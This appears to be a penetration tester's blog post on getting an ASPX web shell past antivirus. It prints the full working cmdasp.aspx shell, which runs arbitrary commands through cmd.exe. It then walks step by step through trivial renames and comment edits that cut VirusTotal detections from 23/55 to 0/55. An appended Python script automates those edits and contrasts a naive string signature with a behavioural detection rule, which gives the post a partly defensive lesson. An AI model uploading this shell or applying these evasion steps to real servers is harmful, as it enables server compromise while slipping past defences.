EASY TRICK TO UPLOAD A WEB SHELL AND BYPASS AV PRODUCTS

During a penetration testing engagement I identified an unrestricted file upload vulnerability. The logical next step was to upload a web shell and compromise the server, but the web server had an antivirus product that was blocking both the upload and the execution of the web shell. During the assessment I was in a hurry, so I used the standard ASPX shell shipped with Kali Linux.

In this article I will take a sample web shell from https://github.com/rustyrobot/fuzzdb/blob/master/web-backdoors/asp/cmdasp.aspx and show how trivial edits are enough to bypass the antivirus product and get the shell uploaded successfully.

The web shell code looks like the below (you can check the same file at the link above):
<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script language="c#" runat="server">
void Page_Load(object sender, EventArgs e)
{
}
// Runs the supplied string through "cmd.exe /c" and returns its standard output
string ExcuteCmd(string arg)
{
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "cmd.exe";
psi.Arguments = "/c "+arg;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
Process p = Process.Start(psi);
StreamReader stmrdr = p.StandardOutput;
string s = stmrdr.ReadToEnd();
stmrdr.Close();
return s;
}
// Button handler: executes the textbox contents and echoes the output inside a <pre> block
void cmdExe_Click(object sender, System.EventArgs e)
{
Response.Write("<pre>");
Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));
Response.Write("</pre>");
}
</script>
<HTML>
<HEAD>
<title>awen asp.net webshell</title>
</HEAD>
<body >
<form id="cmd" method="post" runat="server">
<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button>
<asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
</form>
</body>
</HTML>
<!-- Contributed by Dominic Chell (http://digitalapocalypse.blogspot.com/) -->
<!--    http://michaeldaw.org   04/2007    -->

I saved the file contents as cmdasp.aspx (during the engagement Symantec was deleting the web shell file and I had to turn it off). As a test I uploaded the file to VirusTotal and, as the screenshot below shows, 23 out of 55 AV engines detected the file as malicious.

[Screenshot: Initial AV detection rate on VirusTotal, 23/55]

By then I felt I had to do something to get my juicy web shell onto the client's web server. I started modifying the code and realized how easy it is to bypass signature-based AVs. Here is a walkthrough of what I did to get my web shell down to 0/55 on VirusTotal.

I started by removing the attribution comments, i.e. the last two lines of the file (lines 41 and 42 in the linked repository). I then changed the page title to something else (we will use OffensiveBits here). I uploaded the file to VirusTotal and, to my surprise, the detection count dropped from 23 to 4.

[Screenshot: Second AV detection rate on VirusTotal, 4/55]


As you can see above, this easy trick reduced the detection count far more than I expected. During the assessment Symantec was still deleting the file, so I then changed the function names and added some random comments. I renamed ExcuteCmd to myexec and cmdExe_Click to mycmdEXE (the OnClick attribute on the button has to be updated to the new handler name as well, or the page will not compile), and I changed the label text too. The modified code is shown below (the modified parts were highlighted in the screenshot).

[Screenshot: Modifications to the shell file]

To my surprise, when I uploaded the modified file I got the following result from VirusTotal:

[Screenshot: Zero detection rate on VirusTotal, 0/55]

With these small changes I was able to upload my web shell to the client's website and compromise my way through the IIS server. These simple edits evaded every AV product on VirusTotal with less than 5 minutes of work. The lesson is that the signatures were keyed on cosmetic strings (the title, the attribution comment, the function names) rather than on what the page actually does: a detection keyed on server-side code that spawns cmd.exe and returns its output, or an EDR rule on w3wp.exe launching a command interpreter, would not be fooled by renames and comment edits, and the real fix on the target is the unrestricted file upload itself.
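The following Python script is an added example, not code from this post or from the fuzzdb project. It reproduces the edits described above on an embedded, trimmed copy of cmdasp.aspx (attribution comments stripped, title and label changed, ExcuteCmd and cmdExe_Click renamed including the OnClick attribute, filler comments inserted inside the script block) and then runs both the original and the mutated file through two constructed detection rules: a naive string signature built from the cosmetic strings, and a rule keyed on behavioural indicators (server-side code that spawns cmd.exe with redirected output and writes it back into the response). The indicator lists, the match threshold, the filler comment text and the replacement label text are my own choices; the OffensiveBits title and the new function names are the ones the post uses.

```python
import random
import re

# Constructed, trimmed copy of the public cmdasp.aspx sample (layout styles
# and the empty Page_Load dropped; behaviour unchanged). Scan input only.
ORIGINAL_SHELL = '''<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script language="c#" runat="server">
string ExcuteCmd(string arg)
{
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "cmd.exe";
psi.Arguments = "/c "+arg;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
Process p = Process.Start(psi);
StreamReader stmrdr = p.StandardOutput;
string s = stmrdr.ReadToEnd();
stmrdr.Close();
return s;
}
void cmdExe_Click(object sender, System.EventArgs e)
{
Response.Write("<pre>");
Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));
Response.Write("</pre>");
}
</script>
<HEAD><title>awen asp.net webshell</title></HEAD>
<body>
<form id="cmd" method="post" runat="server">
<asp:TextBox id="txtArg" runat="server" Width="250px"></asp:TextBox>
<asp:Button id="testing" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button>
<asp:Label id="lblText" runat="server">Command:</asp:Label>
</form>
</body>
<!-- Contributed by Dominic Chell (http://digitalapocalypse.blogspot.com/) -->
<!--    http://michaeldaw.org   04/2007    -->
'''

# Cosmetic strings a signature writer might lift from the public sample; none
# of them is needed for the shell to work (constructed rule, not a vendor's).
COSMETIC_STRINGS = ("awen asp.net webshell", "Contributed by Dominic Chell",
                    "michaeldaw.org", "ExcuteCmd", "cmdExe_Click")

# Behavioural indicators: server-side code spawning a command interpreter and
# echoing its output. Renames and comment edits cannot remove these without
# changing what the page does (constructed rule; threshold is my choice).
BEHAVIOUR_PATTERNS = (
    r'runat\s*=\s*"server"',
    r'\bProcessStartInfo\b|\bProcess\.Start\b',
    r'cmd\.exe|powershell',
    r'RedirectStandardOutput\s*=\s*true',
    r'Response\.Write',
)
FILLER = ("TODO: clean up", "legacy path", "cache result")  # constructed text


def mutate(src, seed=1):
    """Apply the post's edits: drop the trailing HTML comments, change the
    title and label, rename both functions, add filler C# comments."""
    rng = random.Random(seed)
    src = re.sub(r"<!--.*?-->\s*", "", src, flags=re.S)
    src = src.replace("awen asp.net webshell", "OffensiveBits")
    src = src.replace("Command:", "Input:")  # label text: my choice
    # \b keeps each rename consistent in the C# body and in OnClick="..."
    src = re.sub(r"\bExcuteCmd\b", "myexec", src)
    src = re.sub(r"\bcmdExe_Click\b", "mycmdEXE", src)
    out, in_script = [], False
    for line in src.splitlines():
        out.append(line)
        s = line.strip()
        if s.startswith("<script"):
            in_script = True
        elif s.startswith("</script"):
            in_script = False
        elif in_script and s.endswith((";", "{", "}")) and rng.random() < 0.5:
            out.append("// " + rng.choice(FILLER))  # C# comment, script block only
    return "\n".join(out) + "\n"


def naive_signature(src):
    """String-match verdict of the kind the post defeated."""
    return any(s in src for s in COSMETIC_STRINGS)


def behaviour_signature(src, threshold=4):
    """Verdict keyed on what the page does, not on how it is labelled."""
    return sum(1 for p in BEHAVIOUR_PATTERNS if re.search(p, src)) >= threshold


def verdicts(src):
    return {"naive": naive_signature(src), "behaviour": behaviour_signature(src)}


if __name__ == "__main__":
    print("original:", verdicts(ORIGINAL_SHELL))
    print("mutated: ", verdicts(mutate(ORIGINAL_SHELL)))
```

Running it prints both verdicts for the original and the mutated file: the naive rule flags only the original, the behavioural rule flags both. The same idea carries over to other command-execution shells in any server-side language: key the rule on the process-spawn API plus an interpreter name and an output redirect rather than on anything the uploader can rename or delete.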
